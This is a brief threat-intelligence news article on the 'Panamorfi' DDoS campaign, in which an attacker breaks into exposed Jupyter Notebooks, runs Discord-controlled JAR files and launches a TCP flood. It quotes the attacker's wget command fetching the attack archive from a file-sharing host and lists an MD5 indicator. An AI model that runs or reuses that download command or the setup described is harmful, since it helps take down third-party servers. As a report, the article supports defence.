Details of a new distributed denial-of-service (DDoS) attack campaign that targets improperly configured Jupyter Notebooks have been revealed by cybersecurity experts.
The threat actor initiates a Distributed Denial of Service (DDoS) attack, dubbed “Panamorfi,” using the Java-based Minecraft DDoS tool, mineping. So far, the attack has exclusively targeted misconfigured Jupyter Notebooks.
Initial access to our Jupyter notebook honeypot exposed to public was obtained by the threat actor “yawixooo.”(as per github) then executed the subsequent command:
‘wget https://filebin.net/archive/h4fhifnlykw224h9/zip’
Two Java archive (JAR) files, conn.jar and mineping.jar, are included in the ZIP file. The former is essential to connect to a Discord channel & start the mineping.jar package.
The connector JAR file contains the initial execution code. The threat actor uses Discord to control the DDoS attack. The victim’s machine connects to the Discord channel using the specified credentials.
It loads mineping.jar, a known Minecraft DDoS tool available on GitHub, to launch a TCP flood attack. This attack overloads the target server with TCP connection requests, with results reported to the Discord channel.
The threat actor, identified as ‘yawixooo,’ has an active public GitHub repository. It includes a Minecraft server configuration and an HTML page under construction.
IOC:
42989a405c8d7c9cb68c323ae9a9a318
Found this article interesting? Follow us on X(Twitter) and LinkedIn to read more exclusive content we post.
